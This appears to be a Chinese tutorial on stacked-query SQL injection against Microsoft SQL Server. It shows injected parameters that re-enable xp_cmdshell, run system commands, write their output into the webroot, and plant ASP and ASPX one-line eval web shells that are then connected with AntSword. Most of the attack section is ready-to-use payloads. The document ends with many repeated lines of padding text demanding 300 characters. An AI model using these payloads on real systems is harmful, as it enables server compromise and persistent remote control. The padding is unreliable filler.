在sql server 中是可以执行多行操作的
两条sql语句可以用分号隔开
select * from art;select * from admin
如果要执行系统命令需要开启 xp_cmdshell
xp_cmdshell 默认在mssql2000中是可以开启的,在mssql2005之后的版本则默认禁止;
如果用户拥有管理员sa权限则可用sp_configure重新开启。
id=1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
有的时候不支持多句执行:
exec sp_configure 'show advanced options', 1; 开启高级选项
RECONFIGURE; 配置生效
exec sp_configure'xp_cmdshell', 1; 开启xp_cmdshell
RECONFIGURE; 配置生效
执行系统命令
1;EXEC master..xp_cmdshell 'ipconfig'
1;EXEC master.dbo.xp_cmdshell 'ipconfig'
页面正常,说明命令被执行成功
data:image/s3,"s3://crabby-images/f7120/f7120f464958a5b070356cd1cdc99e345ddf796e" alt=""
但是并没有限制 ipconfig 的结果;
可以通过写入到文件,在访问文件
id=1;EXEC master..xp_cmdshell 'ipconfig >>C:\inetpub\wwwroot\www.demo1.com\ip1.txt'
id=1;EXEC master.dbo.xp_cmdshell 'ipconfig >>C:\inetpub\wwwroot\www.demo1.com\ip1.txt'
data:image/s3,"s3://crabby-images/b5228/b52280b41a58b229181edd430fecbc97504e1929" alt=""
data:image/s3,"s3://crabby-images/0d1ae/0d1ae0923edead6cd304bd8fabfcb30fd5e9b210" alt=""
getshell
最后 --后面有一个空格 --空格
id=1;exec master..xp_cmdshell 'echo ^<%eval request("pass")%^> >C:\inetpub\wwwroot\www.demo1.com\ip2.asp'--
exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^>>D:\2.aspx' --
data:image/s3,"s3://crabby-images/ab15c/ab15c05b36267d179bdc4a43c37b4da7c8482a49" alt=""
蚁剑测试
data:image/s3,"s3://crabby-images/5d34d/5d34db0e3c2e29ff525f1411237086aa53edccaf" alt=""
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!
一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!